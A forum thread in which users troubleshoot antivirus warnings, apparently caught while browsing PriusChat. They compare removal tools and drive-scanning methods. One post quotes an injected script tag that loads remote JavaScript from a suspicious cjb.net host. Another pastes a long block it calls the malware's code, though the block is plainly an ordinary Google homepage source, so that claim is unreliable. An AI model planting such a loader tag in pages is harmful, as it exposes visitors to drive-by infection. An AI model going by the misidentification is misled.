Received a virus warning? Post a screen shot here

I had some malware about 10 days ago that hijacked my browser. Yes I was browsing this site at the time, but I can not say for sure it came from this site.

It also disabled my anti-virus (Microsoft Security Essentials) and prevented some anti-spyware software from running. With these being my basic defense I had to download some new stuff to remove it. After a few hours it seems the malware went away, but despite my efforts, nothing seemed to actually have done the removal. I never got a positive hit or confirmation that anything was detected.

So I am a bit paranoid on how this thing went away, or if it ever did. Perhaps it is just dormant.

In any event, I have done no less than the following

TDSSKiller
Spybot S&D - Full Scan
Malwarebytes Anti-Malware - Full Scan (this was the software that the malware prevented from running)
IOBytes Malware Fighter - Full Scan
Spyware Doctor - Full Scan (this software turns out to be a bit useless)

Reviewed HijackThis logs
Microsoft Security Essentials - Full Scan
Switched to AVG Anti-Virus, ran Full Scan

ComboFix multiple times

I've updated flash, java and adobe acrobat to the latest versions now

Well nothing has come up with so many scans ... any ideas?

 

It could be some type of a rootkit. When faced with an issue like this, one of the tools in my arsenal is to remove the drive from the affected PC and attach it to a known good PC as a secondary (non-boot) drive and then scan it again using a broad selection of scanners.

As you probably already know, a rootkit is able to hide itself from the operating system on an infected PC so by moving the drive to another system and not booting from it you've removed the ability of the rootkit to hide itself and then it should be a more straightforward process to find and remove it.

I use a USB to pata/sata adapter to attach the drive to the known good PC. Something like this:

Newegg.com - BYTECC BT-300 USB 2.0 to IDE/SATA Adapter

One scanner that I use regularly that you did not mention is SuperAntiSpyware. I think you probably mentioned the rest of the good ones.

SUPERAntiSpyware.com | Remove Malware | Remove Spyware - AntiMalware, AntiSpyware, AntiAdware!

 

If I slave this drive to another computer, would that other computer be able to detect viruses in the master boot record?

This drive is from a laptop and it has a recovery partition, which I will need in order to restore the system if I need to. I'm thinking the virus is not smart enough to modify any files in the recovery partition, but who knows. Usually the recovery partition is not visible even if you run it as a slave. I'm not sure if any antivirus program could scan it.

I'm thinking of just restoring the system, but worried something could have altered the MBR.

 

Yes, if you slave the drive most AV software and popular Malware scanners will detect MBR infections. I'm not aware of anything that will infect a recovery partition off the top of my head but it sure could be possible.

The beauty of scanning a drive that is a slave instead of the boot partition is that all of the drive partitions can be scanned, but as you mentioned, many rootkits begin their bad ways by infecting the MBR. I've had plenty of drives that showed as clean when scanned as boot drives but then showed considerable remaining infections (rootkit and otherwise) when scanned as a secondary drive.

In addition to the SuperAntiSpyware product that I referenced in my previous message, another scanner that I use quite often is HitmanPro. It is a cloud based 2nd opinion malware scanner and is good at finding and removing certain rootkits.

Home - SurfRight

Microsoft also has a bootable scanner that might be worth a try. You can download it here:

Microsoft Standalone System Sweeper Beta | Microsoft Connect

 

The same thing happened to me, somebody must not like this site 'cause it's the only time it happens to me. I went back to an earlier start point and all was well, so I started the scans there.

 

I reinstalled Super Anti Spyware .. turn out I had it but uninstalled for reasons I forget.

It detected another *.dll trojan. Curiously AVG doesn't detect it on its own, but when I run SAS it takes over the job of cleaning it.

AVG seems to function better than Microsoft Security Essentials currently.

I ran TrendMicro RootkitBuster before I ran Super Anti Spyware, which caused AVG to detect the same .dll. RookitBuster didn't detect it though.

 

Another option is to boot from a live CD. To do this you need to have fully operational OS that can run from a CD. Most Linux distributions will work, with Ubuntu being one of the most popular. For Windows you can use the Ultimate Boot CD.

Once the system is booted from the CD, you can mount and scan the affected drives. The main problem with this approach is making sure you have the proper AV software available from the CD.

Tom

 

is there a way to boot ubuntu from a thumb drive with software that is able to scan a windows hard drive?

 

Scan a Windows PC for Viruses from a Ubuntu Live CD - How-To Geek

There are other versions as well, but this will get you started.

Tom

 

Ok, I just got one as a result of doing a Google search for cwerdna us dollar yen wolframalpha and clicking a search result that led to http://priuschat.com/forums/other-c...normal-we-won-t-live-much-longer-deviant.html. Unfortunately, the warning went away but here's history and a partial screenshot.

When viewing the source of that page, I do see :
<script type="text/javascript" src="http://www.eonytxrmv.cjb.net/mbv.js?iusc"></script>

Cjb.net corresponds to the supposed attacking computer/URL.

 

Here is a list of supposed linked URLs that Priuschat "dishes out": Palevo Worm | MalwareSurvival

It does appear that something is injecting bad scripts into the source. Do you have a plain-text source of that page?

I used a virtual machine with a non-persistent drive to open that link and found no reference to that URL. So it is not in the database content more than likely (not in a post or a signature or anything like that). It is probably a google ad or another type of ad.

 

I did have Firefox save down the .htm of the page. Hopefully it didn't mangle it/"fix up" the links.

I've zipped it and attached it. I would be careful about opening it up on a non-virtual machine in anything that might fetch and execute the script (like a browser)... just to be on the safe side.

Unfortunately, I did a quick Google search for web attack malicious toolkit website 10 and got a not very helpful page http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=24121. My antivirus app doesn't seem to let me get any more info than what was displayed in the history.

 

I think this may actually be a server side issue. It is injecting between the page scripts not in an ad section.
It is between the RSS Feed:

Code:

<link rel="alternate" type="application/rss+xml" title="PriusChat Forums - Other Cars - RSS Feed" href="http://priuschat.com/forums/external.php?type=RSS2&amp;forumids=25" />

and some generic image javascript:

Code:

<script type="text/javascript" src="http://cdn.priuschat.com/forums/clientscript/ame.js" >

Here is the javascript code of the malware. It definitely looks evil. It seems like it tries to hide as an ad. So I am guessing instead of installing google ad support himself, he used a plugin and the plugin might have been compromised to give out badness...

Code:

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."><meta name="robots" content="noodp"><title>Google</title><script>window.google={kEI:"nVy4TubrG4OYiQLOpo3HAw",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google.kEI},https:function(){return window.location.protocol=="https:"},kEXPI:"28936,32035,32410,32940,33104,33193,33492,33789,33854,33907,33970,33975,34103",kCSI:{e:"28936,32035,32410,32940,33104,33193,33492,33789,33854,33907,33970,33975,34103",ei:"nVy4TubrG4OYiQLOpo3HAw"},authuser:0,
ml:function(){},kHL:"en",time:function(){return(new Date).getTime()},log:function(a,b,c,e){var d=new Image,g=google,h=g.lc,f=g.li,j="";d.onerror=(d.onload=(d.onabort=function(){delete h[f]}));h[f]=d;if(!c&&b.search("&ei=")==-1)j="&ei="+google.getEI(e);var i=c||"/gen_204?atyp=i&ct="+a+"&cad="+b+j+"&zx="+google.time(),k=/^http:/i;if(k.test(i)&&google.https()){google.ml(new Error("GLMM"),false,{src:i});
delete h[f];return}d.src=i;g.li=f+1},lc:[],li:0,Toolbelt:{},y:{},x:function(a,b){google.y[a.id]=
[a,b];return false}};
window.google.sn="webhp";var i=window.google.timers={};window.google.startTick=function(a,b){i[a]={t:{start:(new Date).getTime()},bfr:!(!b)}};window.google.tick=function(a,b,c){if(!i[a])google.startTick(a);i[a].t[b]=c||(new Date).getTime()};google.startTick("load",true);try{window.google.pt=window.external&&window.external.pageT;}catch(v){}
var _gjwl=location;function _gjuc(){var b=_gjwl.href.indexOf("#");if(b>=0){var a=_gjwl.href.substring(b+1);if(/(^|&)q=/.test(a)&&a.indexOf("#")==-1&&!/(^|&)cad=h($|&)/.test(a)){_gjwl.replace("/search?"+a.replace(/(^|&)fp=[^&]*/g,"")+"&cad=h");return 1}}return 0}function _gjp(){!(window._gjwl.hash&&window._gjuc())&&setTimeout(_gjp,500)};
window._gjp && _gjp()</script><style>#gog{background:#fff}#gbar,#guser{font-size:13px;padding-top:1px !important}#gbar{float:left;height:22px}#guser{padding-bottom:7px !important;text-align:right}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}#gbs,.gbm{background:#fff;left:0;position:absolute;text-align:left;visibility:hidden;z-index:1000}.gbm{border:1px solid;border-color:#c9d7f1 #36c #36c #a2bae7;z-index:1001}.gb1{margin-right:.5em}.gb1,.gb3{zoom:1}.gb2{display:block;padding:.2em .5em}.gb2,.gb3{text-decoration:none !important;border-bottom:none}a.gb1,a.gb4{text-decoration:underline !important}a.gb1,a.gb2,a.gb3,a.gb4{color:#00c !important}a.gb2:hover{background:#36c;color:#fff !important}#gbar .gbz0l{color:#000 !important;cursor:default;font-weight:bold;text-decoration:none !important}</style><style id=gstyle>body{margin:0}#gog{padding:3px 10px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}body,td,a,p,.h{font-family:arial,sans-serif}.h{color:#36c;font-size:20px}.q{color:#00c}.ts td{padding:0}.ts{border-collapse:collapse}em{font-weight:bold;font-style:normal}.lst{height:25px;float:right;width:496px}.gsfi,.lst{font:18px arial,sans-serif}.gsfs{font:17px arial,sans-serif}div.ds{width:512px}.ds{border-bottom:solid 1px #e7e7e7;border-right:solid 1px #e7e7e7;display:-moz-inline-box;display:inline-block;margin:3px 0 4px;margin-left:4px}input{font-family:inherit}a.gb1,a.gb2,a.gb3,a.gb4{color:#11c !important}body{background:#fff;color:black}a{color:#11c;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#36c}a:visited{color:#551a8b}a.gb1,a.gb4{text-decoration:underline}a.gb3:hover{text-decoration:none}#ghead a.gb2:hover{color:#fff!important}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-left:13px;font-size:11px;}.lsbb{background:#eee;border:solid 1px;border-color:#ccc #999 #999 #ccc;height:30px;display:inline-block}.ftl,#fll a{display:inline-block;margin:0 12px}.lsb{background:url(/images/srpr/nav_logo80.png) bottom;border:none;color:#000;cursor:pointer;height:30px;margin:0;outline:0;padding:0 6px;width:auto;overflow:visible;font:15px arial,sans-serif;vertical-align:top}.lsb:active{background:#ccc}.lst:focus{outline:none}#addlang a{padding:0 3px}.gac_v div{display:none}.gac_v .gac_v2,.gac_bt{display:block!important}</style><script>if(!window.google)window.google={};window.google.crm={};window.google.cri=0;window.clk=function(e,f,g,l,m,b,n,h){if(document.images){var a=encodeURIComponent||escape,c=new Image,i=window.google.cri++;window.google.crm[i]=c;c.onerror=(c.onload=(c.onabort=function(){delete window.google.crm[i]}));
if(b&&b.substring(0,6)!="&sig2=")b="&sig2="+b;c.src=["/url?sa=T","","&cd=",a(m),h?"&authuser="+a(h):"",google.j&&google.j.pf?
"&sqi=2":"","&ved=",a(n),e?"&url="+a(e.replace(/#.*/,"")).replace(/\+/g,"%2B"):"","&ei=","nVy4TubrG4OYiQLOpo3HAw",b].join("")}return true};
window.gbar={qs:function(){},tg:function(e){var o={id:'gbar'};for(i in e)o[i]=e[i];google.x(o,function(){gbar.tg(o)})}};</script><link rel="publisher" href="https://plus.google.com/116899029375914044550"></head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onload="document.f&&document.f.q.focus();document.gbqf&&document.gbqf.q.focus();if(document.images)new Image().src='/images/srpr/nav_logo80.png'" ><textarea id=csi style=display:none></textarea><div id=mngb><div id=gog><div id=gbar><nobr><a class="gb1 gbz0l" id=gb_1 href="http://www.google.com/webhp?hl=en&tab=ww">Web</a> <a onclick=gbar.qs(this) class=gb1 id=gb_2 href="http://www.google.com/imghp?hl=en&tab=wi">Images</a> <a onclick=gbar.qs(this) class=gb1 id=gb_12 href="http://video.google.com/?hl=en&tab=wv">Videos</a> <a onclick=gbar.qs(this) class=gb1 id=gb_8 href="http://maps.google.com/maps?hl=en&tab=wl">Maps</a> <a onclick=gbar.qs(this) class=gb1 id=gb_5 href="http://news.google.com/nwshp?hl=en&tab=wn">News</a> <a onclick=gbar.qs(this) class=gb1 id=gb_6 href="http://www.google.com/prdhp?hl=en&tab=wf">Shopping</a> <a class=gb1 id=gb_23 href="https://mail.google.com/mail/?hl=en&tab=wm">Gmail</a> <a class=gb3 href="http://www.google.com/intl/en/options/" onclick="this.blur();gbar.tg(event);return !1" aria-haspopup=true><u>More</u> <small>▼</small></a><div class=gbm id=gbi><a onclick=gbar.qs(this) class=gb2 id=gb_51 href="http://translate.google.com/?hl=en&tab=wT">Translate</a><a onclick=gbar.qs(this) class=gb2 id=gb_10 href="http://books.google.com/bkshp?hl=en&tab=wp">Books</a><a onclick=gbar.qs(this) class=gb2 id=gb_27 href="http://www.google.com/finance?hl=en&tab=we">Finance</a><a onclick=gbar.qs(this) class=gb2 id=gb_9 href="http://scholar.google.com/schhp?hl=en&tab=ws">Scholar</a><a onclick=gbar.qs(this) class=gb2 id=gb_13 href="http://www.google.com/blogsearch?hl=en&tab=wb">Blogs</a><div class=gb2><div class=gbd></div></div><a onclick=gbar.qs(this) class=gb2 id=gb_36 href="http://www.youtube.com/?hl=en&tab=w1">YouTube</a><a class=gb2 id=gb_24 href="https://www.google.com/calendar?hl=en&tab=wc">Calendar</a><a onclick=gbar.qs(this) class=gb2 id=gb_31 href="http://picasaweb.google.com/home?hl=en&tab=wq">Photos</a><a class=gb2 id=gb_25 href="https://docs.google.com/?hl=en&tab=wo">Documents</a><a class=gb2 id=gb_38 href="https://sites.google.com/?hl=en&tab=w3">Sites</a><a onclick=gbar.qs(this) class=gb2 id=gb_3 href="http://groups.google.com/grphp?hl=en&tab=wg">Groups</a><a class=gb2 id=gb_32 href="http://www.google.com/reader/?hl=en&tab=wy">Reader</a><div class=gb2><div class=gbd></div></div><a class=gb2 href="http://www.google.com/intl/en/options/">Even more &raquo;</a></div></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe><a  href="/url?sa=p&pref=ig&pval=3&q=http://www.google.com/ig%3Fhl%3Den%26source%3Diglk&usg=AFQjCNFA18XPfgb7dKnXfKz7x7g1GDH1tg" class=gb4>iGoogle</a> | </span><a href="http://www.google.com/history/optout?hl=en" class=gb4>Web History</a> | <a onclick="this.blur();gbar.tg(event);return !1" aria-haspopup=true aria-owns=gbg class=gb3><u>Settings</u> <small>▼</small></a> | <a id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=en&continue=http://www.google.com/" class=gb4>Sign in</a><div class=gbm id=gbg><a  href="/preferences?hl=en" class=gb2>Search settings</a> </div></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div></div><span><iframe name=wgjf style=display:none></iframe></span><div id=xjsc></div><center><span id=prt style="display:block"><style>.pmoabs{position:absolute;right:0;top:32px}.pmoc{float:right;clear:both}#pmocntr2{behavior:url(#default#userdata);border:1px solid #ccc}#pmocntr2 table{font-size:13px}#pmolnk,#pmolnk div{background:url(/images/modules/buttons/g-button-chocobo-basic-1.gif)}#pmolnk div{background-position:100% -400px}#pmolnk div div{background-position:0 100%}#pmolnk a{white-space:nowrap;background:url(/images/modules/buttons/g-button-chocobo-basic-2.gif) 100% 100% no-repeat;color:#fff;display:block;padding:8px 12px 15px 10px;text-decoration:none}.padi{padding:0 0 4px 8px}.padt{padding:0 6px 4px 6px}</style><div id="pmocntr2" class="pmoabs"><table border="0"><tr><td colspan="2"><img border="0" src="/images/close_sm.gif" class="pmoc" onclick="cpc()"></td></tr><tr><td class="padi" rowspan="2"><img src="/images/icons/product/chrome-48.png"></td><td class="padt" align="center"><b>A faster way to browse the web</b></td></tr><tr><td class="padt" align="center" dir="ltr"><div id="pmolnk"><div><div><a href="http://www.google.com/chrome/index.html?hl=en&brand=CHNG&utm_source=en-hpp&utm_medium=hpp&utm_campaign=en"><b>Install Google Chrome</b></a></div></div></div></td></tr></table></div><script>(function(){try{var a=document.getElementById("pmocntr2");window.cpc=function(){a.style.display="none";try{a.setAttribute("d",1);a.save("pmocntr2");}catch(b){}};window.onresize=function(){try{a.style.visibility=a.offsetWidth*2+276>document.body.clientWidth?"hidden":""}catch(d){}};window.lol=function(){window.onresize()};a.load("pmocntr2");var c=a.getAttribute("i")||0;if(a.getAttribute("d")||c>25)a.style.display="none";else{a.setAttribute("i",++c);a.save("pmocntr2")}}catch(e){};})();</script></span><br clear=all id=lgpd><div id=lga><a href="/search?q=Marie+Curie&amp;ct=curie11-hp&amp;oi=ddle"><img alt="Marie Curie's 144th Birthday" title="Marie Curie's 144th Birthday" border=0 height=125 src="/logos/2011/curie11-hp.jpg" width=392 id=hplogo onload="window.lol&&lol()"/></a><br><br></div><form action="/search" name=f><table cellpadding=0 cellspacing=0><tr valign=top><td width=25%>&nbsp;</td><td align=center nowrap><input name=hl type=hidden value=en><input name=source type=hidden value=hp><div class=ds style="height:32px;margin:4px 0"><input autocomplete=off maxlength=2048 name=q class="lst" title="Google Search" value="" size=57 style="background:#fff;border:1px solid #ccc;border-bottom-color:#999;border-right-color:#999;color:#000;margin:0;padding:5px 8px 0 6px;vertical-align:top"></div><br style="line-height:0"><span class=ds ><span class=lsbb><input name=btnG type=submit value="Google Search" class=lsb></span></span><span class=ds><span class=lsbb><input name=btnI type=submit class=lsb value="I'm Feeling Lucky"></span></span></td><td nowrap width=25% align=left class="fl sblc"><a href="/advanced_search?hl=en">Advanced search</a><a href="/language_tools?hl=en">Language tools</a></td></tr></table><input type=hidden id=gbv name=gbv value="1"><script><!--
function g(a){var b="undefined",c="1";if(a&&a.getElementById)if(typeof XMLHttpRequest!=b)c="2";else if(typeof ActiveXObject!=b){var f,d,e="MSXML2.XMLHTTP",h=[e+".6.0",e+".3.0",e,"Microsoft.XMLHTTP"];for(f=0,d;d=h[f++];)try{new ActiveXObject(d);c="2"}catch(i){}}return c};window.updateFormGBV=function(a){var b=g(a);if(b=="2")a.getElementById("gbv").value=b};
updateFormGBV(document);//-->
</script></form><div style="font-size:83%;min-height:3.5em"><br><div id=prm><p class="std" style="display:none;behavior:url(#default#homePage)" id="shp0"> <a href="/mgyhp.html" onclick="google.promos&&google.promos.mgmhp&& google.promos.mgmhp.cp()"> <img style="margin-right:5px;vertical-align:middle" src="/images/mgyhp_sm.png" border="0" height="14" width="14"/> <span>Make Google my homepage</span> </a> <script type="text/javascript">(function(){if(!google.promos)google.promos={};google.promos.ActionType={ACCEPT:"a",CANCEL:"c",DISMISS:"d",CLICK:"h",IMPRESSION:"i",NO_THANKS:"n",X_BUTTON:"x",MGMHP_ACCEPT:"ma",MGMHP_CANCEL:"mc",MGMHP_IMPRESSION:"mi",MGMHPPD_ACCEPT:"pa",MGMHPPD_CANCEL:"pc",MGMHPPD_IMPRESSION:"pi",MGMHPPD_NO_THANKS:"pn",MGMHPPD_NO_BUTTON:"px",MGMHPPD_DISMISS:"pd"};google.promos.sl=function(b,c,d,a){var e=[d,"id="+b,"loc="+google.sn];e.push("oi=promoslinger");if(a)e.push(a);google.log(c,e.join("&"))};google.promos.si=function(b,c,d,a){if(Math.random()<0.01)google.promos.sl(b,c,a?a:google.promos.ActionType.IMPRESSION,d)};})()
</script> <script>(function(){
;var c={PULLDOWN:"mgmhppd",COUNT:"mgmhp_pd_count",DISMISSED_PROMO:"mgmhp_pd_dp",IS_FROM_HP:"mgmhp_pd_fhp",MIDDLE_PROMO:"shp0",PUSHDOWN_YES:"mgmhppdyes",PUSHDOWN_NO:"mgmhppdno",ONE_GOOGLE_CONTAINER:"mngb",CLASSIC_ONE_GOOGLE_CONTAINER:"gog",SEARCH_FORM:"searchform",CHROME_TOAST:"pmocntr",ALTERNATIVE_CHROME_TOAST:"pmocntr2",GRAY_BAR:".sfbg",APP_BAR:"appbar_b"},e=document.getElementById(c.PULLDOWN),h=window.location.protocol+"//"+window.location.host+"/",i=document.getElementById(c.MIDDLE_PROMO),j=10001,
k=1;if(!google.promos.mgmhp)google.promos.mgmhp={};function l(a){var b=!m(a,c.DISMISSED_PROMO),d=parseInt(m(a,c.COUNT)||0,10),f=d<25;b=b&&amp;amp;f;var g=false;if(b){var o=google.sn=="webhp";if(window.chrome)if(o)google.promos.mgmhp.fhp=true;else g=google.promos.mgmhp.fhp;else{g=m(a,c.IS_FROM_HP)&&google.sn=="web";n(a,c.IS_FROM_HP,o?"1":"")}}b=b&&!g;if(b){n(a,c.COUNT,d+1);a.save(c.PULLDOWN)}return b}function p(){try{return typeof window.localStorage=="object"}catch(a){return false}}
function n(a,b,d){if(p())window.localStorage.setItem(b,d);else if(a){a.setAttribute(b,d);a.save(c.PULLDOWN)}}function m(a,b){if(p())return window.localStorage.getItem(b);else if(a){a.load(c.PULLDOWN);return a.getAttribute(b)}return""}function r(a){google.promos.sl(j,k,a,"ic="+m(e,c.COUNT))}function s(){var a=-1;if(navigator.appName=="Microsoft Internet Explorer"){var b=/MSIE ([0-9]+)[.0-9]*/;if(b.exec(navigator.userAgent))a=parseInt(RegExp.$1)}return a}function t(a,b,d){var f=d?b:-b;return a.offsetTop+
f+"px"}function u(a){var b=document.getElementById(c.SEARCH_FORM),d=document.getElementById(c.CHROME_TOAST)||document.getElementById(c.ALTERNATIVE_CHROME_TOAST),f=google.dom.get(c.GRAY_BAR),g=e.offsetHeight;if(b)b.style.top=t(b,g,a);if(d)d.style.top=t(d,g,a);if(f&&!b)f.style.top=t(f,g,a);google.msg&&google.msg.send(64)}google.promos.mgmhp.pd_tp=function(a){try{if(!e)return;var b=document.getElementById(c.ONE_GOOGLE_CONTAINER)||document.getElementById(c.CLASSIC_ONE_GOOGLE_CONTAINER);if(a){if(google.sn==
"web"&&e.style.display=="")return;if(s()==7&&navigator.userAgent.indexOf("Trident/")==-1){var d=document.getElementById(c.PUSHDOWN_YES),f=document.getElementById(c.PUSHDOWN_NO);if(d)d.style.display="inline";if(f)f.style.display="inline"}e.style.display="";u(true);if(b)b.style.position="relative";document.body.style.marginTop=0}else{u(false);e.style.display="none";if(b)b.style.position="";document.body.style.marginTop=""}}catch(g){google.ml(g,false,{cause:"MGMHP_PD_TP"})}};google.promos.mgmhp.pd_cp=
function(){try{if(!e)return;e.setHomePage(h);var a=google.promos.ActionType.MGMHPPD_CANCEL;if(e.isHomePage(h)){a=google.promos.ActionType.MGMHPPD_ACCEPT;google.promos.mgmhp.pd_tp(false)}r(a)}catch(b){google.ml(b,false,{cause:"MGMHP_PD_CP"})}};google.promos.mgmhp.pd_dp=function(a){try{n(e,c.DISMISSED_PROMO,"1");e.save(c.PULLDOWN);google.promos.mgmhp.pd_tp(false);r(a?a:google.promos.ActionType.MGMHPPD_DISMISS)}catch(b){google.ml(b,false,{cause:"MGMHP_PD_CP"})}};google.promos.mgmhp.pd_be=function(a){try{var b=
a.target||a.srcElement;switch(a.type){case "mouseover":b.style.color="#fff";break;case "mouseout":b.style.color="#bcc9e8";break}}catch(d){google.ml(d,false,{cause:"MGMHP_PD_BE"})}};google.promos.mgmhp.cp=function(){try{i.setHomePage(h);var a=google.promos.ActionType.MGMHP_CANCEL;if(i.isHomePage(h))a=google.promos.ActionType.MGMHP_ACCEPT;google.promos.sl(j,k,a)}catch(b){google.ml(b,false,{cause:"MGMHP_CP"})}};function v(){try{if(e&&!e.isHomePage(h)&&l(e)){google.promos.mgmhp.pd_tp(true);google.promos.si(j,
k,null,google.promos.ActionType.MGMHPPD_IMPRESSION)}else if(i&&!i.isHomePage(h)){i.style.display="block";google.promos.si(j,k,null,google.promos.ActionType.MGMHP_IMPRESSION)}}catch(a){google.ml(a,false,{cause:"MGMHP_INIT"})}}google.x({id:"mgmhp"},function(){v()});
})()
</script> </p></div></div><div id=res></div><span id=footer><center id=fctr><div style="font-size:10pt"><div id=fll style="margin:19px auto;text-align:center"><a href="/intl/en/ads/">Advertising&nbsp;Programs</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="color:#767676;font-size:8pt">&copy; 2011 - <a href="/intl/en/privacy.html">Privacy</a></p></center></span> <div id=xjsd></div><div id=xjsi><script>if(google.y)google.y.first=[];google.dlj=function(b){window.setTimeout(function(){var a=document.createElement("script");a.src=b;document.getElementById("xjsd").appendChild(a)},0)};
if(google.y)google.y.first=[];if(!google.xjs){google.dstr=[];google.rein=[];if(google.timers&&google.timers.load.t){google.timers.load.t.xjsls=new Date().getTime();}google.dlj('/extern_js/f/CgJlbhICdXMrMEU4ACwrMFo4ACwrMA44ACwrMBc4ACwrMDw4ACwrMFE4ACwrMJgBOAAsKzAKOACaAgJoZSwrMBY4ACwrMBk4AJoCAnNoLCswJTgALCswTTgALCswTjgALCswVDgALCswYzgALCswaTgALCswigE4ACwrMJIBOAAsKzCsATgALCswGDgALCswJjgALIACUJACVg/cpFCejz3KiQ.js');google.xjs=1}google.neegg=1;google.mc=[];google.mc=google.mc.concat([[69,{}],[14,{}],[60,{}],[81,{}],[152,{}],[78,{}],[25,{"g":8,"k":false,"m":{"bks":true,"blg":true,"dsc":true,"evn":true,"flm":true,"frm":true,"isch":true,"klg":true,"mbl":true,"nws":true,"plcs":true,"ppl":true,"prc":true,"pts":true,"rcp":true,"shop":true,"vid":true},"t":null}],[10,{}],[105,{}],[22,{"m_errors":{"32":"Sorry, no more results to show.","default":"\u003Cfont color=red\u003EError:\u003C/font\u003E The server could not complete your request.  Try again in 30 seconds."},"m_tip":"Click for more information"}],[77,{}],[138,{"abOn":false,"fourSugg":false}],[146,{}],[99,{}],[84,{}],[24,{}],[38,{}]]);google.y.first.push(function(){try{var form=document.gbqf||document.f||document.f||document.gs;google.ac.i(form,form.q,'','','',{"p":1,"sw":1,"o":1,"l":1,"c":1},'hp',{"dh":true,"exp":"kjrmc","host":"google.com","jsonp":true,"msgs":{"lcky":"I'm Feeling Lucky","lml":"Learn more","psrc":"This search was removed from your <a href=\"/history\">Web History</a>","psrl":"Remove","srch":"Google Search"}});}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script></div><script>(function(){var a,b=window.location.href.match(/\/webhp\?[^#]*tune=[^#]*/);if(a=b&&b.length>0?"http://www.google.com/logos/2011/lespaul.html#"+b[0].substr(7):null)google.nav&&google.nav.go?google.nav.go(a):window.location.href=a;})();</script><script>(function(){
var b,d,e,f;function g(a,c){if(a.removeEventListener){a.removeEventListener("load",c,false);a.removeEventListener("error",c,false)}else{a.detachEvent("onload",c);a.detachEvent("onerror",c)}}function h(a){f=(new Date).getTime();++d;a=a||window.event;var c=a.target||a.srcElement;g(c,h)}var i=document.getElementsByTagName("img");b=i.length;d=0;for(var j=0,k;j<b;++j){k=i[j];if(k.complete||typeof k.src!="string"||!k.src)++d;else if(k.addEventListener){k.addEventListener("load",h,false);k.addEventListener("error",
h,false)}else{k.attachEvent("onload",h);k.attachEvent("onerror",h)}}e=b-d;function l(){if(!google.timers.load.t)return;google.timers.load.t.ol=(new Date).getTime();google.timers.load.t.iml=f;google.kCSI.imc=d;google.kCSI.imn=b;google.kCSI.imp=e;if(google.stt!==undefined)google.kCSI.stt=google.stt;google.timers.load.t.xjs&&google.report&&google.report(google.timers.load,google.kCSI)}if(window.addEventListener)window.addEventListener("load",l,false);else if(window.attachEvent)window.attachEvent("onload",
l);google.timers.load.t.prt=(f=(new Date).getTime());
})();
</script>

 

This is no bueno. Where is the malicious code being served? Through PriusChat.com's html server or through some 3rd party html server.

How does the malware inject itself onto the system? Is it browser specific?

If I switch browsers, will the same code not be able to infect the system?

 

Just got one on home page screen when I hit the FORUMS link.

Infection Details

URL:http://priuschat.com/forums/|%3E{gzip}
Process:file://C:\Program Files\Internet Explore...
Infection:html:Script-inf

Note in the past, AVAST virus detector has reportedly showed false positives for Script-inf (according to Google hits)

 

Here are the ones I've caught over the last week. Today's popped while I was on Prius Chat right after I used the search box to read about Octane

 

You are showing a screen shot of MSE, which found an infected file in Avira. Are you running both MSE and Avira?

On my computer there was a Java Exploit found in the Java Cache directory.

 

The little image of a coffee cup that Java uses did pop up on my tool bar seconds before both Avira and Microsoft Essentials said I had a malware. I do run them both of them because I wanted one and my husband wanted the other. Thus, I have them both

 

Uninstall any old versions of Java you have, except the latest. The latest version is Java 6 Update 29

Uninstall any version of Java Runtime Environment you may have

 

Done, thanks!